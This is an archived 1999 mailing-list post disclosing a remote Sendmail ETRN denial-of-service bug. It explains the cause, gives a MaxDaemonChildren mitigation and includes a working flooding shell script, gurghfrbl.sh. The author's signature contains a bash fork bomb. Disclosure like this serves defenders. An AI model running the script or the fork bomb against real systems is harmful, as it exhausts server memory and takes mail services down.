Re: procmail / Sendmail - five bugs

From: Michal Zalewski (lcamtufat_private)
Date: Wed Dec 22 1999 - 13:22:12 PST

Next message: Matt: "Fw: Re-release of Microsoft Security Bulletin MS99-046"

Previous message: The Wall: "FTPPro insecuities"
Maybe in reply to: Michal Zalewski: "procmail / Sendmail - five bugs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 21 Dec 1999, Rob Jones wrote:

> with or without these double-quotes the message is immediately dropped
> on redhat linux with the message

Oops! Yes, apparently this problem affects all versions of Sendmail, but
only with .cf file left from 8.8.x or previous releases. In fact, obsolete
.cf files are quite common if Sendmail has been updated by administrator -
'from hand' or from binary packages like .rpm - as people has not enough
time and good will to rebuild config files when replacing binary
(especially if there are some extensions/custom .cf settings).

So, another thing. There's nice remote Sendmail ETRN DoS. When ETRN
command is read by Sendmail (it shouldn't be allowed at all, IMHO), it
calls fork(). Parent process generates no output - only child-generated
output is sent, so parent won't be notified on send()/write() failure. If
we drop connection (after sending a lot of ETRNs), parent process will
stuck, doing repeately fork() ... sleep(5), till end of ETRNs read into
input buffer is reached. This allows us to spawn any amount of 'unusable'
sendmail childs, hanging for long period of time - and it can be done
using low network bandwitch and resources. Direct result - all server
memory consumed (causing Linux 2.0 kernels to crash with messages like 'no
memory for sendmail', 'no memory for klogd' etc). Unlike connect()
flooding, this attack is generating low traffic, only one connection at
time, and seems to be deadly harmful, unless something like:

# maximum number of children we allow at one time
O MaxDaemonChildren=15

is defined in sendmail.cf (as far I recall, this option is disabled by
default). The exploit follows (written for it's beautiful name):

-- gurghfrbl.sh --
#!/bin/sh

TARGET=localhost
COUNT=150
SLEEP=1

echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"

while :; do
  echo -n "."
  (
    NIC=0
    while [ "$NIC" -lt "$COUNT" ]; do
      echo "ETRN x"
    done
  ) | telnet $TARGET 25 &>/dev/null &
  sleep $SLEEP
  killall -9 telnet &>/dev/null
done
-- EOF --

_______________________________________________________________________
Michal Zalewski [lcamtufat_private] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]

Next message: Matt: "Fw: Re-release of Microsoft Security Bulletin MS99-046"
Previous message: The Wall: "FTPPro insecuities"
Maybe in reply to: Michal Zalewski: "procmail / Sendmail - five bugs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:23:29 PDT